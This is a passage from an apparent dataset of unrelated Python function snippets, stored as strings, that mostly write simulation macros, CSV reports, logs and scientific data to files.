range(int(e_steps)+1):\n filename = \"x0y%sz0ke%s.mac\" %(dy*y + y_min, e*de + e_min)\n path = path1\n fullpath = os.path.join(path, filename)\n f = open(fullpath, \"w\")\n f.write('/rat/physics_list/OmitMuonicProcesses true\\n')\n f.write(\"/rat/physics_list/OmitHadronicProcesses true \\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write('/rat/db/set DETECTOR geo_file \"geo/snoplus.geo\"\\n')\n f.write('/rat/db/set GEO[scint] material \"labppo_scintillator\"\\n')\n f.write('/rat/db/set DAQ dqxx_info 0 \\n')\n f.write(\"/run/initialize \\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"/rat/proc frontend\\n\")\n f.write(\"/rat/proc trigger\\n\")\n f.write(\"/rat/proc eventbuilder\\n\")\n f.write(\"/rat/proc count\\n\")\n f.write(\"/rat/procset update 100\\n\")\n f.write(\"/rat/proc calibratePMT\\n\")\n f.write(\"/rat/proc scintFitter\\n\")\n f.write(\"/rat/proclast outroot\\n\")\n f.write('/rat/procset file \"x0y%sz0ke%s.root\"\\n' %(dy*y + y_min, e*de + e_min))\n f.write(\"\\n\")\n f.write(\"\\n\")\n 
f.write(\"/generator/add combo gun:point:poisson\\n\")\n f.write(\"# want random, isotropic momentum distribution; energy given in MeV\\n\")\n f.write(\"/generator/vtx/set e- 0 0 0 %s\\n\" %(e*de + e_min))\n f.write(\"# position given in Cartesians, relative to detector center, in mm\\n\")\n f.write(\"/generator/pos/set 0 %s 0\\n\" % (dy*y + y_min))\n f.write(\"/generator/rate/set 1\\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"/rat/run/start %s\\n\" %(n))\n f.write(\"exit\")", "def result_file(accession_list):\n with open(\"../accessions_list.txt\", 'w') as file:\n file.write(accession_list)", "def list_to_ccd(weather_list: list, parameter_info: dict, file_path: str) -> bool:\n\n # Write meta data\n file_obj = open(file_path, 'w')\n file_obj.write(f\"# {parameter_info['location_name']}\\n\")\n file_obj.write(f\"# Year {parameter_info['year']}\\n\")\n file_obj.write(f\"# RIBuild - Hourly values, {parameter_info['description']} \\n\\n\")\n file_obj.write(parameter_info[\"intro\"] + \"\\n\\n\")\n\n # Write data\n day = 0\n hour = 0\n for i in range(len(weather_list)):\n\n # leap year 29th febuary removal\n\n if i % 24 == 0 and i != 0:\n hour = 0\n day += 1\n\n hour_str = str(hour) + \":00:00\"\n data = weather_list[i]\n file_obj.write(f'{day:>{6}}{hour_str:>{9}} {data:.2f}\\n')\n\n hour += 1\n\n file_obj.close()\n\n return True", "def write_to_csv(self):\n\n dump_list = []\n\n # add rows one by one, each as a list, even if only 1 element\n\n dump_list.append([\"test execution ID\",self.ID])\n dump_list.append([\"test execution name\",self.name])\n\n dump_list.append([\"test definition ID\",self.test_def_ID])\n test_def_name = get_indexed_item_from_file(self.test_def_ID, FILE_TEST_DEFINITIONS)\n dump_list.append([\"test definition name\",test_def_name])\n\n dump_list.append([\"associated challenge execution ID\",self.challenge_exec_ID])\n dump_list.append([\"user ID\",self.user_ID])\n\n if self.start_time != None:\n dump_list.append([\"test start time\",self.start_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n\n if self.finish_time != None:\n dump_list.append([\"test finish time\",self.finish_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n\n if self.challenge_start_time != None:\n dump_list.append([\"challenge stop time\",self.challenge_start_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n if self.restoration_detection_time != None:\n dump_list.append([\"restoration detection time\",self.restoration_detection_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n if self.recovery_time != None:\n if self.recovery_time.value != None:\n if type(self.recovery_time.value)==timedelta:\n # timedelta: days and seconds are attributes, total_seconds() is a method\n dump_list.append([\"MEASURED RECOVERY TIME (s)\",self.recovery_time.value.total_seconds()])\n rtday = self.recovery_time.value.days\n rthrs = self.recovery_time.value.seconds // 3600\n rtmin = (self.recovery_time.value.seconds % 3600) // 60\n rtsec = self.recovery_time.value.seconds % 60\n rtmil = self.recovery_time.value.microseconds\n dump_list.append([\"MEASURED RECOVERY TIME (days, hours, mins, seconds, microseconds)\",\n rtday, rthrs, rtmin, rtsec, rtmil])\n\n if self.associated_metric_values.length() > 0 :\n dump_list.append([\"Metric Values:\"])\n for item in self.associated_metric_values.get_timestamped_metric_values_as_strings():\n dump_list.append([item])\n\n if self.log.length() > 0 :\n dump_list.append([\"Log:\"])\n for item in self.log.get_timestamped_strings():\n dump_list.append([item])\n\n if self.CLI_responses.length() > 0 :\n 
dump_list.append([\"CLI responses:\"])\n for item in self.CLI_responses.get_timestamped_strings():\n dump_list.append([item])\n\n if self.API_responses.length() > 0 :\n dump_list.append([\"API responses:\"])\n for item in self.API_responses.get_timestamped_strings():\n dump_list.append([item])\n\n try:\n # output CSV file name: testDefExec + ID + start time + .csv\n file_name = \"testDefExec\" + \"{0:0=3d}\".format(self.test_def_ID) + \"-\" + self.start_time.strftime(\"%Y-%m-%d-%H-%M-%S\") + \".csv\"\n with open(file_name, \"w\", newline=\"\") as file:\n csv_file_writer = csv.writer(file)\n csv_file_writer.writerows(dump_list)\n except Exception as e:\n print(type(e), e)\n sys.exit()", "def record_time(t):\n\n f = open('time.out', 'w')\n f.write(str(t))\n f.close()", "def outputFunc(filename, parks,roading,private):\n #assert len(parks) == 3\n \n f = open(filename, 'wt')\n \n try:\n writer = csv.writer(f)\n writer.writerow(days)\n writer.writerow(parks)\n writer.writerow(roading)\n writer.writerow(private)\n finally:\n f.close()", "def write_output(arr, filename):\n print('Started writing the output..')\n f = open(filename, 'w')\n for a in arr:\n f.write(str(a) + '\\n')\n f.close()\n print('Done!, Open the file to see the approved loans.')", "def makereport(reslist, file=sys.stdout, hasTOI=False, hasRuns=False):\n\n if not hasRuns: reslist=[reslist]\n \n for irun, resrun in enumerate(reslist):\n file.write(\"Run: %d\\n\" % irun)\n for det, res in resrun.items():\n file.write(\"%d\" % det)\n\n try:\n if not hasTOI: \n val = res[1][0]\n sig = res[1][1]\n else:\n val = res[-1][1][0]\n sig = res[-1][1][1]\n \n for (v, s) in zip(val, sig):\n file.write(\" %f +- %f\" % (v, s))\n except:\n print(\"\\n... when running \", irun, det, end=' ')\n print(\"Unexpected error:\", sys.exc_info()[0])\n \n file.write(\"\\n\")", "def write_output(output):\n with open(\"/Users/maxwell/Documents/workspace/CoronaScan/results.csv\", 'a') as f:\n writer = csv.writer(f)\n print(\"Now writing output to results.csv . . 
.\")\n values = list(output.values())\n values.insert(0, datetime.date.today())\n writer.writerow(values)\n print(\"Finished writing output!\")", "def dump_all_binaries_to_CSV():\n ## TODO\n timenow = datetime.now()", "def test_write_race_results_to_file():\n number = random.randint(1, 3)\n f1.write_race_results_to_file(number)\n with open(f\"results_for_race_{number}.txt\", encoding=\"utf-8\") as opened_file:\n list_of_lines = opened_file.readlines()\n assert len(list_of_lines) == 13", "def write_list_to_file(myList, filename):\r\n\r\n with open(filename, \"w\") as outfile:\r\n for entries in myList:\r\n outfile.write(entries)\r\n\t\t\t# add a return after each line\r\n outfile.write(\"\\n\")", "def SaveListFile(file,lst):\n\tlst = [str(i) +\"\\n\" for i in lst]\n\tif len(lst) == 0:\n\t\treturn\n\twith open(file,'w') as f:\n\t\tf.writelines(lst)\n\treturn lst", "def save(self, path):\n for tube in self.inactive_tube_list:\n with open(path + \"{}.tube\".format(tube.id) , 'w+') as f:\n #f.write(\"Tube:{},{}\\n\".format(tube.id, len(tube))) \n for det in tube.detection_list:\n f.write(\"{}, {}, {}, {}, {}, {}, {}\\n\".format(det.frame_number, det.label, det.x1, det.y1, det.x2, det.y2, det.interpolated))", "def _write_endcy():\n return []", "def _save_target_info(self):\n \n #make sure the file exists\n path = self.communicator.image_store.project_path + \\\n self.target_file_name\n fout = open(path, 'w')\n\n print str(1)\n print str(len(self.target_list)-1)\n for i in range(1, len(self.target_list)):\n fout.write(self.target_list[i].format_info())\n fout.write(\"\\n\\n\")\n fout.close()", "def write_to_txt(self):\r\n file = open(self.output_path, 'w')\r\n for question_id in self.question_ids:\r\n file.write(self.questions[question_id].question_string+str(self.questions[question_id].answer)+'\\n')\r\n file.close()", "def write_to_csv(self):\n\n dump_list = []\n\n # add rows one by one, each as a list, even if only 1 element\n\n dump_list.append([\"challenge execution ID\",self.ID])\n dump_list.append([\"challenge execution name\",self.name])\n\n dump_list.append([\"challenge definition ID\",self.challenge_def_ID])\n challenge_def_name = get_indexed_item_from_file(self.challenge_def_ID, FILE_CHALLENGE_DEFINITIONS)\n dump_list.append([\"challenge definition name\",challenge_def_name])\n\n if self.start_time != None:\n dump_list.append([\"challenge start time\",self.start_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n if self.stop_time != None:\n dump_list.append([\"challenge stop time\",self.stop_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n\n if self.log.length() > 0 :\n dump_list.append([\"Log:\"])\n for item in self.log.get_timestamped_strings():\n dump_list.append([item])\n\n if self.CLI_responses.length() > 0 :\n dump_list.append([\"CLI responses:\"])\n for item in self.CLI_responses.get_timestamped_strings():\n dump_list.append([item])\n\n if self.API_responses.length() > 0 :\n dump_list.append([\"API responses:\"])\n for item in self.API_responses.get_timestamped_strings():\n dump_list.append([item])\n\n try:\n # output CSV file name: challDefExec + ID + start time + .csv\n file_name = \"challDefExec\" + \"{0:0=3d}\".format(self.challenge_def_ID) + \"-\" + self.start_time.strftime(\"%Y-%m-%d-%H-%M-%S\") + \".csv\"\n with open(file_name, \"w\", newline=\"\") as file:\n csv_file_writer = csv.writer(file)\n csv_file_writer.writerows(dump_list)\n except Exception as e:\n print(type(e), e)\n sys.exit()", "def save_to_file(self, tojuliet):\n if self.lc.time[0] < 1e4:\n self.lc.time += 2457000\n 
ascii.write([self.lc.time, self.lc.flux, self.lc.flux_err], 'TIC%d.dat' % self.TIC,\n format='fixed_width_no_header', delimiter=' ', overwrite=True)\n if tojuliet:\n ascii.write([self.lc.time, self.lc.flux, self.lc.flux_err,\n ['TESS' for _ in self.lc.time]], 'TIC%d_juliet.dat' % self.TIC,\n format='fixed_width_no_header', delimiter=' ', overwrite=True)", "def save_state(self):\n\t\tf = open('output.csv', 'a')\n\t\tstate = ';'.join([str(datetime.now()), str(self.thin._actuation_value), str(self.thin.temperature), str(self.thin.presence), str(self.outside.temperature)])\n\t\tprint(state)\n\t\tf.write(state + '\\n')\n\t\tf.close()", "def write_to_file(self, results):\n with open(self.outputFilename, \"w\") as csvFile:\n csvWriter = csv.writer(csvFile, delimiter=',') \n title_row = ('asset_id', 'component_id', 'latitude', 'longitude', 'installation_date', 'commissioning_date', 'street_name', 'cabinet_id', 'nominal_wattage', 'current_time', 'current_LogValue', 'current_IsLogValueOff') \n csvWriter.writerow(title_row)\n for record in results:\n csvWriter.writerow(record)", "def save_to_file(filename, R_list):\n k = len(R_list)\n with open(filename+'_board', mode='w') as file:\n file.write('There are totally {} candidates\\n'.format(k))\n for i in range(k):\n file.write('# {}\\n'.format(i+1))\n file.write(str(get_board(R_list[i])) + '\\n')\n\n save_var(filename, R_list)", "def print_to_file(start, stop, time_worked, work_text, work_log):\n today = datetime.date.today()\n\n record = ' || %.2f || %.2f || %.4f hours || %s\\n' % (start, stop, time_worked/3600, work_text)\n\n #if it is a new file you have the option to set a start time for the project\n # and how many hours a week you want to work\n if not os.path.isfile(work_log):\n while True:\n option = raw_input('\\nThis is a new log, would you like to specify a start date and a hours per week goal for the project? (y/n): ').lower()\n if option == 'y':\n date = raw_input('\\nplease enter the start date of the project (dd-mm-yyyy): ')\n hours_per_week = raw_input('\\nplease enter the number of hours you intend to work on the project per week: ')\n try:\n datetime.datetime.strptime(date, '%d-%m-%Y')\n if hours_per_week.isdigit():\n f = open(work_log, 'a')\n f.write('#! 
|| ' + date + ':' + hours_per_week + '\\n')\n f.close()\n break\n else:\n print \"\\nPlease enter a valid number for hours to work!\\n\"\n except ValueError:\n print \"\\nPlease enter a valid date!\\n\"\n\n else:\n break\n\n\n f = open(work_log, 'a')\n print '\\n\\n' + today.strftime('%b-%d-%Y') + record\n f.write(today.strftime('%b-%d-%Y') + record)\n f.close()", "def write_list_to_file(program, list_to_write):\n with open(program.split('.')[0] + \".output.json\", 'a+') as output_file:\n output_file.write(json.dumps(list_to_write, indent=3, sort_keys=False))", "def write_file(l_dta, outputfile):\n l_dta2 = []\n for row in l_dta:\n s = '\\t'.join(row)\n l_dta2.append(s)\n s_dta = \"\\r\\n\".join(l_dta2)\n try:\n with open(outputfile, 'w') as fd:\n fd.write(s_dta)\n except (IOError,) as e:\n tracker()\n return None", "def sed_write_prob_mat_list_to_submission_csv(na_list, prob_mat_list, lbs, \n thres_ary, step_sec, out_path):\n create_folder(os.path.dirname(out_path))\n f = open(out_path, 'w')\n cnt = 0\n for n in xrange(len(na_list)):\n na = na_list[n]\n prob_mat = prob_mat_list[n]\n flag = False\n for i2 in xrange(len(lbs)):\n event_list = vad.activity_detection(x=prob_mat[:, i2], \n thres=thres_ary[i2], \n n_smooth=10, \n n_salt=10)\n if len(event_list) != 0:\n flag = True\n for [bgn, fin] in event_list:\n bgn_sec = step_sec * bgn\n fin_sec = step_sec * fin\n f.write(na + \"\\t\" + str(bgn_sec) + \"\\t\" + \\\n str(fin_sec) + \"\\t\" + lbs[i2] + \"\\n\")\n if flag == False: \n f.write(na + \"\\n\")\n f.close()\n print \"Write\", out_path, \"successfully!\"", "def save_to(self, path, overwrite=False, for_stsp=False):\n dirname = self.name\n output_path = os.path.join(path, dirname)\n self.times = Time(self.times)\n\n if not for_stsp:\n if os.path.exists(output_path) and overwrite:\n shutil.rmtree(output_path)\n\n if not os.path.exists(output_path):\n os.mkdir(output_path)\n for attr in ['times_jd', 'fluxes', 'errors', 'quarters']:\n np.savetxt(os.path.join(path, dirname, '{0}.txt'.format(attr)),\n getattr(self, attr))\n\n else:\n if not os.path.exists(output_path) or overwrite:\n attrs = ['times_jd', 'fluxes', 'errors']\n output_array = np.zeros((len(self.fluxes), len(attrs)), dtype=float)\n for i, attr in enumerate(attrs):\n output_array[:, i] = getattr(self, attr)\n np.savetxt(os.path.join(path, dirname+'.txt'), output_array)", "def action_date_ret(self):\n for wh in self.browse():\n if not wh.date_ret:\n self.write([wh.id],\n {'date_ret': time.strftime('%Y-%m-%d')})\n return True", "def writeChronListToFile(self):\n ## write header\n for header_line in self.outData['header']:\n self.outFile.write(header_line + '\\n')\n ##loop through each msg list\n for msg_list in self.outData_temp:\n ## create line\n msg_line = reconstructLine(msg_list)\n ## write to file\n self.outFile.write(msg_line + '\\n')", "def saveUsage(self, filePath):\n message = time.strftime('%c') + ' : '\n for spot in self.getParkingSpots():\n message += str(spot.id) + ', ' + spot.status + '; '\n with open(filePath, 'a+') as outfile:\n outfile.write(message + '\\n')\n pass", "def save_to_MTFIT_style_file(MTs, MTp, nlloc_hyp_filename, inversion_type, outdir, MTp_absolute=[], shift_idxs=[]):\n # Get uid and stations data:\n uid, stations = get_event_uid_and_station_data_MTFIT_FORMAT_from_nonlinloc_hyp_file(nlloc_hyp_filename)\n # Write all data to output dict:\n out_dict = {}\n out_dict[\"MTs\"] = MTs\n out_dict[\"MTp\"] = MTp\n out_dict[\"uid\"] = uid\n out_dict[\"stations\"] = stations\n if len(MTp_absolute)>0:\n 
out_dict[\"MTp_absolute\"] = MTp_absolute\n if len(shift_idxs)>0:\n out_dict[\"shift_idxs\"] = shift_idxs\n # And save to file:\n out_fname = outdir+\"/\"+uid+\"_FW_\"+inversion_type+\".pkl\"\n print(\"Saving FW inversion to file:\", out_fname)\n pickle.dump(out_dict, open(out_fname, \"wb\"))", "def write_to_file(self) -> None:\n with open(self.output_file_path, mode='w', newline='') as csv_file:\n tweet = ['id', 'created_time', 'text']\n writer = csv.DictWriter(csv_file, fieldnames=tweet)\n writer.writeheader()\n for tweet in self.clean_unique_tweets:\n try:\n writer.writerow(tweet)\n except:\n pass\n print(\"Tweets written to a file\")", "def generateTruths(self, cont):\n truthf = self.outdir + \"/tracks.csv\"\n old = os.dup(1)\n sys.stdout.flush()\n os.close(1)\n os.open(truthf, os.O_WRONLY | os.O_CREAT)\n cont.printallTruths()\n sys.stdout.flush()\n os.close(1)\n os.dup(old)\n os.close(old)", "def write_to_file_ann(self) -> None:\n with open(self.output_file_path, mode='w', newline='') as csv_file:\n tweet = ['id', 'created_time', 'text']\n writer = csv.DictWriter(csv_file, fieldnames=tweet)\n writer.writeheader()\n for tweet in self.unique_tweets:\n try:\n writer.writerow(tweet)\n except:\n pass\n print(\"Tweets written to a file\")", "def write(lst):\n # TODO", "def produce_solution(y):\n\n with open('out.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', lineterminator=\"\\n\")\n writer.writerow(['id', 'y'])\n for i in range(y.shape[0]):\n writer.writerow([i, y[i]])", "def savepotentialtest(pot, xx, path):\n potential = []\n coordinates = []\n for ii in range(0, len(pot)):\n coordinates.append(xx[ii])\n potential.append(pot[ii])\n np.savetxt(path, np.transpose([coordinates, potential]))", "def write_defined_phase(ct, te, del_phi_phase_defined):\n\tcsvfile = \"../output/defined_phase.txt\"\n\twith open(csvfile, \"w\") as output:\n\t\twriter = csv.writer(output, lineterminator='\\n')\n\t\tfor val in del_phi_phase_defined:\n\t\t\twriter.writerow([val]) \n\tcsvfile = \"../output/defined_phase_time.txt\"\n\twith open(csvfile, \"w\") as output:\n\t\twriter = csv.writer(output, lineterminator='\\n')\n\t\tfor val in te:\n\t\t\twriter.writerow([val]) \n\tcsvfile = \"../output/time.txt\"\n\twith open(csvfile, \"w\") as output:\n\t\twriter = csv.writer(output, lineterminator='\\n')\n\t\tfor val in ct:\n\t\t\twriter.writerow([val])", "def save_done_file(outdir, filename=None):\n time_tag = current_time_str()\n if filename == None:\n filename = f\"DONE_{time_tag}.txt\"\n outfn = os.path.join(outdir, filename)\n with open(outfn, \"w\") as outf:\n outf.write(f\"DONE at {time_tag}\\n\")", "def save_solrad_to_HELP(filename, years, precip, city, lat):\n root, ext = osp.splitext(filename)\n filename = filename if ext == '.D13' else filename + '.D13'\n\n fheader = format_weather_header_for_HELP(3, 2, city, lat)\n fdata = format_timeseries_for_HELP(years, precip, '{0:>5}', '{0:>6.2f}')\n save_content_to_csv(filename, fheader + fdata)", "def save_solrad_to_HELP(filename, years, precip, city, lat):\n root, ext = osp.splitext(filename)\n filename = filename if ext == '.D13' else filename + '.D13'\n\n fheader = format_weather_header_for_HELP(3, 2, city, lat)\n fdata = format_timeseries_for_HELP(years, precip, '{0:>5}', '{0:>6.2f}')\n save_content_to_csv(filename, fheader + fdata)", "def save_list(lines, filename):\n data = '\\n'.join(lines)\n file = open(filename, 'w')\n file.write(data)\n file.close()", "def write_telluric_transmission_to_file(wls,T,outpath):\n import pickle\n 
print('------Saving teluric transmission to '+outpath)\n with open(outpath, 'wb') as f: pickle.dump((wls,T),f)", "def __writeToFile(self, filePath, lst): \n \n if not self.outDir is None: \n filePath = os.path.join(self.outDir, filePath) \n \n open(filePath,'a').writelines(lst)", "def makeSpkSetupFile(leapSecondFilePath, outputPath):\n\n # If the file already exists, delete it and rewrite it.\n if os.path.exists(outputPath):\n os.remove(outputPath)\n\n# print 'Generating LRONAC compatible .pvl file ' + halfResFilePath\n f = open(outputPath, 'w')\n f.write(\"\\\\begindata\\n\")\n f.write(\"INPUT_DATA_TYPE = 'STATES'\\n\")\n f.write(\"OUTPUT_SPK_TYPE = 13\\n\")\n f.write(\"OBJECT_ID = -85\\n\") # LRO\n f.write(\"CENTER_ID = 301\\n\") # Moon\n f.write(\"REF_FRAME_NAME = 'J2000'\\n\")\n f.write(\"PRODUCER_ID = 'Lronac Pipeline'\\n\")\n f.write(\"DATA_ORDER = 'epoch x y z vx vy vz'\\n\")\n f.write(\"DATA_DELIMITER = ','\\n\")\n f.write(\"LEAPSECONDS_FILE = '\" + leapSecondFilePath + \"'\\n\")\n f.write(\"LINES_PER_RECORD = 1\\n\")\n f.write(\"TIME_WRAPPER = '# ETSECONDS'\\n\")\n #f.write(\"EPOCH_STR_LENGTH = 16\\n\")\n f.write(\"INPUT_DATA_UNITS = ('ANGLES=DEGREES' 'DISTANCES=km')\\n\")\n f.write(\"POLYNOM_DEGREE = 11\\n\")\n f.write(\"SEGMENT_ID = 'SPK_STATES_13'\\n\")\n# f.write(\"INPUT_DATA_FILE = 'spkDataFile.txt'\")\n# f.write(\"OUTPUT_SPK_FILE = '/home/smcmich1/testSpkFile.bsp'\")\n f.write(\"\\\\begintext\\n\")\n f.close()", "def newtwogfile(ntf_twogs):\n outfile = open(\"Twogs.txt\", \"w\")\n for x in ntf_twogs:\n outfile.write(\"%s\\n\" % x)\n outfile.close()", "def write_file(self, lst_of_palidroms: list, result_file: str):\n with open(result_file, 'w', encoding='utf-8', errors='ignore') as result:\n for word in lst_of_palidroms:\n result.write(word + '\\n')", "def saveStatsFile(self):\n if not os.path.exists(\"stats\"):\n os.mkdir(\"stats\")\n now = datetime.datetime.now()\n parts = [now.year, now.month, now.day]\n parts = [\"%02d\"%x for x in parts]\n todaysFileName = \"-\".join(parts)+\".txt\" \n timeStamp = time.strftime(\"%y%m%d%H%M\", time.localtime())\n log = \",\".join(self.logLinesStats)\n fname = \"stats/\"+todaysFileName\n with open(fname, 'a') as f:\n f.write(timeStamp+\",\"+log+\"\\n\")\n self.log(\"wrote \"+fname)", "def save_log(fname, end_loss, end_l2_loss, t_time, rewards=None):\n # write summary of logs, and the parameters used\n with open(fname + \".json\", \"wt\") as f:\n j = {\n # data params\n 'J': J,\n 'T': T,\n 'num_features': num_features,\n 'R': R_TOTAL,\n 'weights_file': WEIGHTS_FNAME,\n # model hyperparams\n 'epochs': args.epochs,\n 'layers': N_IDEN_PROB,\n 'eta': args.eta,\n # misc params\n 'seed': args.seed,\n # end results\n 'runtime': t_time,\n 'end_loss': float(end_loss),\n 'end_l2_loss': float(end_l2_loss),\n }\n\n if args.test:\n j['test_file'] = args.test\n\n if args.rand:\n j['device'] = 'gpu' if args.cuda else 'cpu'\n\n json.dump(j, f, indent=4, separators=(',', ': '))\n\n if rewards is not None:\n with open(fname + \".txt\", \"wt\") as f:\n np.savetxt(f, np.expand_dims(rewards, axis=0), fmt=\"%.15f\", delimiter=\" \")", "def outputFunc(filename, resultList):\n #assert len(parks) == 3\n \n f = open(filename, 'wt')\n \n try:\n writer = csv.writer(f)\n for i in range(len(resultList)):\n print resultList[0]\n writer.writerow(resultList[i])\n \n finally:\n f.close()", "def create_activity(self, f_output='activity.txt'):\n list_tuple = []\n epoch = datetime.datetime.utcfromtimestamp(0)\n count_outside = 0\n for bot_id in range(0,5):\n print bot_id\n 
filename = \"retweeters_%d_backup.csv\" % bot_id\n path_to_file = self.dir_name + \"/\" + filename\n f = open(path_to_file, 'r')\n for line in f:\n # Discard tweet_id (first element) and newline (last element)\n list_retweeter_time = line.split(',')[1:-1]\n if len(list_retweeter_time) != 0:\n idx = 0\n while idx < len(list_retweeter_time):\n retweeter_id = list_retweeter_time[idx]\n if retweeter_id in self.map_userid_number:\n retweeter_num = self.map_userid_number[retweeter_id]\n outside = 0\n else:\n retweeter_num = -1\n outside = 1\n count_outside += 1\n idx += 1\n # year-month-day-hour-min-second (UTC - 4)\n tweet_time = list_retweeter_time[idx]\n dt_local = datetime.datetime.strptime(tweet_time, '%Y-%m-%d-%H-%M-%S')\n dt_utc = dt_local + datetime.timedelta(hours=4)\n seconds = (dt_utc - epoch).total_seconds()\n list_tuple.append( (seconds,retweeter_num,outside) )\n idx += 1\n list_tuple.sort()\n f_write = open(f_output, 'w')\n for t in list_tuple:\n f_write.write(\"%d %d %d\\n\" % (t[0], t[1], t[2]))\n f_write.close()\n print \"Total number of retweets from outside network = %d\" % count_outside", "def make_submission(y_predict, user_movie_ids, file_name='submission',\n date=True):\n\n # Naming the file\n if date:\n file_name = '{}_{}'.format(file_name, time.strftime('%d-%m-%Y_%Hh%M'))\n\n file_name = '{}.txt'.format(file_name)\n\n # Writing into the file\n with open(file_name, 'w') as handle:\n handle.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for (user_id, movie_id), prediction in zip(user_movie_ids,\n y_predict):\n\n if np.isnan(prediction):\n raise ValueError('The prediction cannot be NaN')\n line = '{:d}_{:d},{}\\n'.format(int(user_id), int(movie_id), prediction)\n handle.write(line)\n return file_name", "def Save_Fastas2(UniprotIDs):\r\n file=open(\"../Data/Negative_cases/negative_cases.fasta\",\"w\")\r\n for ID in UniprotIDs:\r\n data=urllib.request.urlopen(\"http://www.uniprot.org/uniprot/%s.fasta\" %ID)\r\n f=data.readlines()\r\n for lines in f:\r\n file.write(str(lines))\r\n #help(data)\r\n file.close()", "def generate_report(check_info_list, to_path):\n # 1.generate info list to dictionary structure\n check_result_data_list = []\n for check_info in check_info_list:\n check_result_data = OrderedDict()\n check_result_data[\"region\"] = check_info.region\n check_result_data[\"version\"] = check_info.version\n\n check_result_data[\"check_message\"] = check_info.detail_info_list\n check_result_data[\"check_state\"] = check_info.state\n\n check_result_data_list.append(check_result_data)\n # 2.sort data list\n check_result_data_list.sort(key=lambda d: d['version'])\n check_result_data_list.sort(key=lambda d: d['region'])\n # check_result_data_list.sort(key=lambda d: d['check_state'])\n # 3.save js check_report\n Util.write_to_js_file(to_path, check_result_data_list)", "def write_match(iout, match):\n \n np.savetxt('match_{0:d}.list'.format(iout), match, fmt='%d %d %.4f')", "def mark_tasks(data):\n try:\n i =0\n while i<30:\n new_date = (date.today() + timedelta(days=i)).strftime(\"%d-%m-%Y\")\n if data.get(new_date)==None:\n i+=1\n continue\n \n os.system(\"clear\")\n message = \"\"\" \\t\\t===============Mark tasks ============== \"\"\"\n print(message)\n print(\"\\nAt date: \", new_date)\n new_lst = [[x[0],idx] for idx,x in enumerate(data[new_date]) if x[1]<0]\n\n for j in range(len(new_lst)):\n print(\"\\t-{} {}\".format(j+1, new_lst[j][0]))\n \n if len(new_lst)==0:\n i+=1\n print(\"\\tNo tasks remaining here.\") \n continue\n\n c1 = int(\"0\"+input(\"\\nChoose the 
task between [{}-{}] to mark as complete. \\nChoose {} or more to goto next date. \\nChoose 0 to terminate: \".format(min(1,len(new_lst)),len(new_lst), len(new_lst)+1)))\n \n if c1==0:\n break\n elif c1>len(new_lst):\n i+=1\n continue\n \n # c2 = int(input(\"\\nChoose the task between [1-{}] to mark as complete: \".format(len(new_lst))))\n \n data[new_date][new_lst[c1-1][1]][1]*=-1\n print(\"\\n[$$$]Marked as complete!!!\\n\")\n c2 = int(\"0\"+input(\"Mark more here? y(0), n(anything else): \"))\n if c2!=0:\n i+=1\n # json.dump(data,open(TODO_FILE, \"w+\"))\n\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt\")\n except :\n print(\"Some error occurred\")\n finally:\n write_file(data)", "def createPageTimeFile(pages,domain):\n filename = domain+'_pageLoads.csv'\n textfile = file(filename,'wt')\n \n for p in pages:\n try:\n timeofrequest = datetime.today()\n load_time = str(pageLoad.getResponseTime(p))\n results = p + ',' + load_time + ',' + str(timeofrequest)\n print results\n textfile.write(results+'\\n')\n except NameError:\n print 'error with URL, ' + p\n \n textfile.close()\n return filename", "def save_to_file(todoList, doneList):\n\n filePath = os.path.expanduser('~/todoSave')\n f = open(filePath, 'w+')\n # wipe the old save file\n f.truncate(0)\n\n\n obj = {\"todo\": todoList, \"done\": doneList}\n f.write(json.dumps(obj, indent=4))", "def success_callback(self):\n temp_schedule = self.run_dir / \"SLABSurfaceTemps.txt\"\n if temp_schedule.exists():\n with open(self.idf.idfname, \"a\") as outfile:\n with open(temp_schedule) as infile:\n next(infile) # Skipping first line\n next(infile) # Skipping second line\n for line in infile:\n outfile.write(line)\n # invalidate attributes dependant on idfname, since it has changed\n self.idf._reset_dependant_vars(\"idfname\")\n self.cleanup_callback()", "def make_times(night, runs, observatory, times, full, instrument, okwrite):\n\n # use this to check times are vaguely right. time of runs\n # must lie between 06.00 local time on date corresponding to\n # start of night date and 1.5 days later. Has picked up a\n # few erroneously dated nights on the TNT.\n mjd_ref = Time(night).mjd - observatory.lon.degree/360 + 0.25\n\n tdata = {}\n with open(times if okwrite else os.devnull,'w') as tout:\n for run in runs:\n if full:\n print(f'Analysing times for run {run}')\n dfile = os.path.join(night, run)\n try:\n ntotal = 0\n if instrument == 'HiPERCAM':\n rtime = hcam.hcam.Rtime(dfile)\n else:\n rtime = hcam.ucam.Rtime(dfile)\n\n # Find first good time, has to roughly match the start\n # date of the night because some times can just be\n # junk\n not_alerted = True\n for n, tdat in enumerate(rtime):\n if instrument == 'HiPERCAM':\n time, tinfo, tflag = tdat\n expose = 1000000\n for tmid,texp,tiflag in tinfo:\n expose = min(round(texp,3),expose)\n else:\n time, tinfo = tdat[:2]\n tflag = time.good\n expose = round(time.expose,3)\n\n if instrument == 'HiPERCAM' or tflag:\n mjd_start = time.mjd\n tdelta = mjd_start-mjd_ref\n if tdelta > 0 and tdelta < 1.5:\n ts = Time(mjd_start, format=\"mjd\", precision=2)\n ut_start = ts.hms_custom\n n_start = n+1\n if expose >= 0 and expose < 2000:\n break\n elif not_alerted and (tdelta < 0 or tdelta > 1.5):\n # maximum one warning per run\n not_alerted = False\n print(f' Bad time: tdelta = {tdelta} < 0 or > 1.5 on time {n} of {dfile}')\n else:\n ntotal = 0\n raise hcam.HipercamError(f'No good times found in {dfile}')\n\n # Find last good time. First we just go for times near the\n # end of the run. 
